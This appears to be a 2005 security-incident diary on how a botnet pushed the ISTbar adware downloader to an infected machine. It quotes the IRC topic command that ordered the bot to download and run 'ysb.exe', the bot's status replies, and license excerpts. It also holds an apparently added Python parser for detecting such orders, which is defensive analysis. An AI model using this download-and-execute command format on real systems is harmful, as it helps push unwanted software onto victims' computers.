Botnets and Adwares-Spywares connection

I am sure you already know about botnets, right? Ok, I am quite sure that you also know that one of the purposes of botnets, besides all the nice stuff written by our Handler Mike Poor in his diary "Big Business surrounding Internet Fraud", is to spread malware, right? Ok (again), today I would like to show you how botnets are also spreading adware/spyware software. As the bot is remotely controlled by the botnet owner, it can do anything...
While investigating a bot today, I found this instruction to the bot:

:MySQL 332 USA|xxxxxxx #c :xdownload32 c:\ysb.exe 1

This instruction told my bot to download the ysb.exe 'software' to my computer and open it, as the next messages show:

#c :[DOWNLOAD]: Downloading URL: to: c:\ysb.exe.
#c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.
#c :[DOWNLOAD]: Opened: c:\ysb.exe.
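The channel-topic order and the bot's [DOWNLOAD] replies above are the kind of traffic a network sensor or IRC log review can match on. The following is an added example, not code from the diary: a small Python parser that recognises the RPL_TOPIC (IRC numeric 332) line carrying the order and correlates it with the later "Downloaded" and "Opened" status lines. The verb spelling `xdownload32` and the reading of the trailing `1` as a run-after-download flag are assumptions drawn from this one sample.

```python
import re
from typing import Dict, List, Optional

# Constructed sample modelled on the lines in the diary; the download URL is
# redacted there as well, so the tokens are exactly what the bot printed.
SAMPLE_LOG = [
    r":MySQL 332 USA|xxxxxxx #c :xdownload32 c:\ysb.exe 1",
    r"#c :[DOWNLOAD]: Downloading URL: to: c:\ysb.exe.",
    r"#c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.",
    r"#c :[DOWNLOAD]: Opened: c:\ysb.exe.",
    r"#c :just chatting",
]

# IRC numeric 332 is RPL_TOPIC (":<server> 332 <nick> <channel> :<topic>"),
# so the bot is reading its order from the channel topic.
TOPIC_RE = re.compile(r"^:(?P<server>\S+) 332 (?P<nick>\S+) (?P<chan>#\S+) :(?P<topic>.+)$")
STATUS_RE = re.compile(r"^(?P<chan>#\S+) :\[DOWNLOAD\]: (?P<msg>.+)$")
DOWNLOADED_RE = re.compile(r"^Downloaded (?P<kb>[\d.]+) KB to (?P<path>\S+) @ [\d.]+ KB/sec\.?$")
OPENED_RE = re.compile(r"^Opened: (?P<path>.+?)\.?$")


def parse_line(line: str) -> Optional[Dict]:
    """Turn a topic-command or [DOWNLOAD] status line into an event dict; None otherwise."""
    m = TOPIC_RE.match(line)
    if m:
        verb, *args = m.group("topic").split()
        return {"type": "command", "channel": m.group("chan"), "verb": verb, "args": args}
    m = STATUS_RE.match(line)
    if not m:
        return None
    msg = m.group("msg")
    d = DOWNLOADED_RE.match(msg)
    if d:
        return {"type": "downloaded", "path": d.group("path"), "kb": float(d.group("kb"))}
    o = OPENED_RE.match(msg)
    if o:
        return {"type": "opened", "path": o.group("path")}
    return {"type": "status", "msg": msg}


def find_download_and_execute(lines: List[str]) -> List[Dict]:
    """Pair a download order with the bot's 'Opened' report for the same file path."""
    findings, pending = [], {}
    for ev in filter(None, map(parse_line, lines)):
        # Assumption: "<verb> [url] <path> <flag>", flag 1 meaning run after download;
        # the path is the second-to-last token whether or not the URL survived.
        if ev["type"] == "command" and ev["verb"].lower().startswith("xdownload") and len(ev["args"]) >= 2:
            path, flag = ev["args"][-2], ev["args"][-1]
            pending[path.lower()] = {"channel": ev["channel"], "path": path, "run": flag == "1", "kb": None}
        elif ev["type"] == "downloaded" and ev["path"].lower() in pending:
            pending[ev["path"].lower()]["kb"] = ev["kb"]
        elif ev["type"] == "opened" and ev["path"].lower() in pending:
            hit = pending.pop(ev["path"].lower())
            hit["executed"] = True
            findings.append(hit)
    return findings
```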

As soon as the file was downloaded and opened, this window came up:

This 'software' is recognized by some AV engines at VirusTotal as a downloader or as ISTbar.
Nice points from the License Agreement:

9. OTHER SOFTWARE. You allow that third party software may be installed in the Software and the Integrated Search Technologies shall not be liable to anyone with respect to such third party software.
16. UPDATES. You grant Integrated Search Technologies permission to add/remove features and/or functions to the existing Software and/or Service, or to install new applications or third party software, at any time, in its sole discretion with or without your knowledge and/or interaction. By doing so, you agree to the terms of the new applications. You also grant Integrated Search Technologies permission to make any changes to the Software and/or Service provided at any time.

Ok, ok...old stuff, but it is always nice to know how these things suddenly appear on your computer...:)
Handler on Duty: Pedro Bueno


Nov 2nd 2005
